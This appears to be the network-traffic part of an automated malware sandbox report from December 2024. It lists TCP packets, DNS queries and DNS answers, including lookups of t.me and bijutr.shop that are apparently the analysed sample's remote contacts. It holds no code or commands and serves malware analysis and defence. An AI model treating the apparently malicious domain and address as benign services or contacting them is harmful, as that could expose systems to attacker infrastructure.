                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.506724119 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.506840944 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.507004023 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.507015944 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.507128000 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.507139921 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.507201910 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.507299900 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.507318020 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.507467985 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.507479906 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.507491112 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.507500887 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.507895947 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.536447048 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.543111086 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.862931967 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.866563082 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.871329069 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.871495008 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.871575117 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.871586084 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.871709108 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.871790886 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.871856928 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.871865988 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.897969007 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:51.219695091 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.141379118 CET50119443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.142090082 CET50119443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.142759085 CET59047443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.143102884 CET59047443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.457043886 CET44359047172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.457675934 CET44359047172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.457770109 CET44359047172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.457935095 CET59047443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.466089010 CET44350119162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.467928886 CET44350119162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.468019962 CET44350119162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.468199968 CET50119443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:59.541906118 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:59.865868092 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:59.870733023 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:59.870771885 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:59.870801926 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:59.888776064 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:59.929563999 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:59.940987110 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.237101078 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.264800072 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.270078897 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.270092010 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.270167112 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.270447016 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.281809092 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.605278015 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.611761093 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.611773014 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.611865044 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.612194061 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.620270967 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.945317030 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.951141119 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.951196909 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.951241970 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.959119081 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:00.987608910 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.005644083 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.307548046 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.329327106 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.333662033 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.333719015 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.333811998 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.334292889 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.361489058 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.368688107 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.866985083 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.869360924 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.869374037 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.869384050 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.869395018 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.869405985 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.870471954 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:01.888597012 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.189065933 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.189634085 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.192024946 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.197535992 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.217479944 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.219331980 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.222626925 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.222665071 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.222827911 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.223066092 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.234205008 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.557714939 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.564204931 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.564214945 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.564316034 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.564450979 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.571033001 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.894473076 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.900109053 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.900196075 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.900245905 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.900367022 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.906469107 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.235735893 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.241005898 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.241219044 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.241271973 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.241888046 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.246474028 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.573210001 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.578737020 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.578773975 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.578944921 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.578955889 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.584971905 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.908485889 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.913305998 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.913338900 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.913444042 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.913793087 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.918997049 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:04.242474079 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:04.249697924 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:04.249717951 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:04.249825001 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:04.249963999 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:04.266382933 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:04.819946051 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:04.880594969 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:04.880609035 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:04.880669117 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:04.880697966 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:04.881006956 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:04.912678957 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:04.931493044 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:05.094947100 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:05.096216917 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:05.143352032 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:05.205387115 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:05.266753912 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:05.271168947 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:05.271197081 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:05.271281958 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:05.289130926 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:05.289244890 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:05.335875034 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:05.451167107 CET56335443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:05.643806934 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:05.776729107 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:05.804672956 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:05.804682970 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:05.804764032 CET4435633523.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:06.377794981 CET4435633523.209.72.40192.168.2.5

                                                                                                                                                                                                                                                                                                  ICMP Packets

                                                                                                                                                                                                                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.614265919 CET192.168.2.51.1.1.1c210(Port unreachable)Destination Unreachable

                                                                                                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:03.459307909 CET192.168.2.51.1.1.10xdebStandard query (0)sAOREpcgcodbdSPJ.sAOREpcgcodbdSPJA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:38.126513004 CET192.168.2.51.1.1.10xeb05Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:40.315506935 CET192.168.2.51.1.1.10xa826Standard query (0)bijutr.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:56.711786032 CET192.168.2.51.1.1.10xdc2cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:56.711991072 CET192.168.2.51.1.1.10xc675Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:23.668062925 CET192.168.2.51.1.1.10x4263Standard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:23.668354034 CET192.168.2.51.1.1.10xe2f4Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:25.946657896 CET192.168.2.51.1.1.10xef92Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:25.946826935 CET192.168.2.51.1.1.10xb257Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:26.578464985 CET192.168.2.51.1.1.10xab04Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:26.578695059 CET192.168.2.51.1.1.10x7776Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.476882935 CET192.168.2.51.1.1.10x8c2bStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.477464914 CET192.168.2.51.1.1.10x5d9bStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.478415012 CET192.168.2.51.1.1.10x5e12Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.478415012 CET192.168.2.51.1.1.10xf4a4Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.484591961 CET192.168.2.51.1.1.10x7553Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.484750986 CET192.168.2.51.1.1.10x1d35Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.590353012 CET192.168.2.51.1.1.10x7946Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.590555906 CET192.168.2.51.1.1.10x388aStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.593118906 CET192.168.2.51.1.1.10x219cStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.593380928 CET192.168.2.51.1.1.10x937dStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.594314098 CET192.168.2.51.1.1.10x92ddStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.594470978 CET192.168.2.51.1.1.10xcbb4Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.819720030 CET192.168.2.51.1.1.10x845dStandard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.820228100 CET192.168.2.51.1.1.10x6246Standard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.826128006 CET192.168.2.51.1.1.10xb0cbStandard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.826250076 CET192.168.2.51.1.1.10x471aStandard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.963573933 CET192.168.2.51.1.1.10x899aStandard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.963826895 CET192.168.2.51.1.1.10x8db4Standard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:29.099253893 CET192.168.2.51.1.1.10xcab5Standard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:29.099524975 CET192.168.2.51.1.1.10xbbf1Standard query (0)api.msn.com65IN (0x0001)false

                                                                                                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:03.693176031 CET1.1.1.1192.168.2.50xdebName error (3)sAOREpcgcodbdSPJ.sAOREpcgcodbdSPJnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:38.263519049 CET1.1.1.1192.168.2.50xeb05No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:40.461776972 CET1.1.1.1192.168.2.50xa826No error (0)bijutr.shop188.245.216.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:56.848560095 CET1.1.1.1192.168.2.50xdc2cNo error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:56.848710060 CET1.1.1.1192.168.2.50xc675No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:23.806257963 CET1.1.1.1192.168.2.50x4263No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:23.806555986 CET1.1.1.1192.168.2.50xe2f4No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:24.314667940 CET1.1.1.1192.168.2.50x93a1No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:24.315020084 CET1.1.1.1192.168.2.50x91a8No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:24.315020084 CET1.1.1.1192.168.2.50x91a8No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:26.083543062 CET1.1.1.1192.168.2.50xb257No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:26.178047895 CET1.1.1.1192.168.2.50xef92No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:26.715428114 CET1.1.1.1192.168.2.50xab04No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:26.715428114 CET1.1.1.1192.168.2.50xab04No error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:26.715895891 CET1.1.1.1192.168.2.50x7776No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.614211082 CET1.1.1.1192.168.2.50x8c2bNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.614211082 CET1.1.1.1192.168.2.50x8c2bNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.614339113 CET1.1.1.1192.168.2.50x5d9bNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.615326881 CET1.1.1.1192.168.2.50x5e12No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.615326881 CET1.1.1.1192.168.2.50x5e12No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.615375042 CET1.1.1.1192.168.2.50xf4a4No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.621902943 CET1.1.1.1192.168.2.50x1d35No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.622060061 CET1.1.1.1192.168.2.50x7553No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.622060061 CET1.1.1.1192.168.2.50x7553No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.727411032 CET1.1.1.1192.168.2.50x7946No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
